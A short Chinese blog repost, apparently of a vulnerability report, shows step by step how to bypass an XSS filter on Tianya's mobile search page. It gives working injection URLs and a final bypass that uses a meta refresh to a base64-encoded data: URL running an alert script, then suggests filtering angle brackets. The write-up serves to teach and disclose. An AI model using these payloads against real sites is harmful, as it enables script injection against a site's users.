一个具有学习意义的XSS过滤器绕过
详细说明:
天涯过滤了一切JavaScript,治标不治本
漏洞证明:
这是目标页面
m.tianya.cn/sch/sch.jsp1.我们先提交test试试
输出在了value属性
2.接下来我们用 ” /> 闭合标签
看起来没什么问题
3.接下来我们构造
http://m.tianya.cn/sch/sch.jsp?vu=75425544423&k=%22/%3E%3Ciframe%3E
可以看见iframe正常显示
4.接下来我们构造
m.tianya.cn/sch/sch.jsp?vu=75425544423&k="/><iframe onload=alert()>
出现错误。
5.我们再构造
m.tianya.cn/sch/sch.jsp?vu=75425544423&k="/><iframe onload=eval(String.fromCharCode(97,108,101,114,116))>
仍然出现错误
6.我们换个姿势
m.tianya.cn/sch/sch.jsp?vu=75425544423&k=" /> <meta http-equiv=refresh content=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K ><!--
这里采用了data协议的base64编码欺骗浏览器..成功绕过…
修复方案:
过滤<>
转载请注明:jinglingshu的博客 » 天涯社区 一个具有学习意义的XSS过滤器绕过